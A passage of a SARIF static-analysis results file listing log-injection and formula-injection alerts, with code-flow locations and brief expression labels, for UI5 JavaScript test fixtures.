[ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... 
param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "751ece7cb6fd18f7:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "191c273ff0751536:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a 
[user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 
15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 50, + "endColumn" : 55 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 56 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 33, + "endColumn" : 57 + } + }, + "message" : { + "text" : "encodeX ... 
value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 21, + "endColumn" : 57 + } + }, + "message" : { + "text" : "sanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + }, + "message" : { + "text" : "sanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "27d08bf2c216b384:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 22 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 21, + "endColumn" : 49 + } + }, + "message" : { + "text" : "oModel. ... 
input\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 13, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "41899ff1a967017d:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : 
